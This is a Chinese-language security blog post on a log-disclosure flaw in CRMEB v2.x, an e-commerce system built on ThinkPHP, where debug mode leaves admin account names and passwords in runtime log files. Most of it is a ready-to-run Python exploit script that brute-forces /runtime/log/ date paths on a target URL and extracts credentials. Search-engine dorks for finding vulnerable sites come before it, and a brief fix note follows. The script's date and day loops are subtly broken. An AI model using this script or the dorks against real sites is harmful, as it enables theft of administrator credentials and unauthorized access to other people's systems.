MENU

Crmeb runtime日志泄露后台登录信息

August 29, 2019 • Read: 82 • 安全阅读设置

0x01 漏洞概述

CRMEB是一款基于ThinkPhp5.0+Vue+EasyWeChat的客户、电商管理系统,帮助中小企业快速积累客户、会员数据分析、智能转化客户、有效提高销售、会员维护等。产生泄露主要原因还是ThinkPHP二次开发的部分系统,debug功能未关,runtime目录生成了日志文件导致的泄露。
  • 影响版本
Crmeb v2.x
  • 组件Dork
Powered by CRMEB!
app:"CRMEB"

0x02 漏洞利用

# -*- coding:utf-8 -*-
# !/usr/bin/env python
# python CRMEB_Log_Disclosure@Coco413.py http://example.com

import re
import sys
import traceback
import warnings
import requests
from urlparse import urlparse
from concurrent.futures import ThreadPoolExecutor

reload(sys)
sys.setdefaultencoding('utf-8')
requests.packages.urllib3.disable_warnings()
warnings.filterwarnings("ignore")


def payloads(base_url):
    year_month, payloads = ['201912', '201911', '201910', '201909', '201909', '201907', '201906', '201905', '201904',
                            '201903', '201902', '201901'], []
    for year in year_month:
        for day in xrange(1, 32):
            if day < 10:
                day = '0' + str(day)
                payloads.append(urlparse(base_url).scheme + "://" + urlparse(
                    base_url).hostname + '/runtime/log/' + year + '/' + str(day) + '.log')
    return payloads


def scan(url):
    try:
        print "[→] Checking url:", url
        r = requests.get(url, verify=False, timeout=10)
        r.close()
        username = re.compile("'account' => '(.*?)'", re.S)
        password = re.compile("'pwd' => '(.*?)'", re.S)
        result = re.findall(password, r.text)
        if result:
            account = re.findall(username, r.text)
            print "[✓] Username:{} | Password:{}".format(account[0], result[0])
    except requests.exceptions.ConnectionError:
        pass
    except requests.ReadTimeout:
        pass
    except:
        traceback.print_exc()


def main(base_url):
    try:
        with ThreadPoolExecutor(5) as exector:
            exector.map(scan, payloads(base_url))
    except:
        traceback.print_exc()


if __name__ == '__main__':
    url = sys.argv[1]
    main(url)


0x03 漏洞修复

删除runtime/logs下文件,APP_DEBUG设置为false。


0x04 漏洞参考

CRMEB最新版敏感日志泄露